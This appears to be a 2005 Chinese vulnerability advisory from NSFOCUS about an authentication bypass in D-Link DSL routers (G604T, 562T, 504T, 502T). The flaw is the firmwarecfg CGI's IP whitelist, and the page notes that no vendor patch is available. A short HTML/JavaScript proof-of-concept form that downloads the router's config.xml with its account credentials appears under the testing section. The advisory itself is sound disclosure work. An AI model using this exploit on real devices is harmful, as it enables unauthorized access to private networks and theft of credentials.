首页 -> 安全研究

安全研究

安全漏洞
D-Link DSL路由器可绕过访问认证漏洞

发布日期:2005-05-20
更新日期:2005-05-20

受影响系统:
D-Link DSL -G604T
D-Link DSL -562T
D-Link DSL -504T
D-Link DSL -502T
描述:
BUGTRAQ  ID: 13679

D-Link DSL路由器是家庭和小型办公室常用的路由器。

D-Link DSL路由器对用户访问的认证存在问题,远程攻击者可能利用此漏洞非授权访问设备。

在执行CGI /cgi-bin/firmwarecfg时,脚本会检查在/var/tmp/中是否存在fw_ip文件。如果存在这个文件的话,就会允许其中列出的所有IP地址无需认证直接访问设备。如果不存在这个文件的话,CGI就会创建一个新文件,在其中写入请求地址。

如果可以从Internet访问Web配置控制台且之前没人调用过CGI的话,则任何用户都可以访问路由器,下载包含有用户帐号和口令的config.xml文件,导致访问专用网络,修改或更改路由器的固件等。

<*来源:Francesco Orro (francesco.orro@akhela.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111652806030943&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html><head>Download config.xml:<title>GetConfig - Config file
download</title></head><body>

<script lang="javascript">
function invia_richiesta()
{
document.DownloadConfig.action='http://'+document.InputBox.Host.value+'/cgi-
bin/firmwarecfg';
document.DownloadConfig.submit();
}
</script>

<form name="InputBox">
<br>http://<input Name="Host" type="text" value="">/cgi-bin/firmwarecfg<br>
</form>
<form name="DownloadConfig" method="POST" action=""
enctype="multipart/form-data">
<input type="Submit" name="config" value="Download"
onClick="javascript:invia_richiesta();"><br>
</form></body></html>

建议:
厂商补丁:

D-Link
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.dlink.com/

浏览次数:3563
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障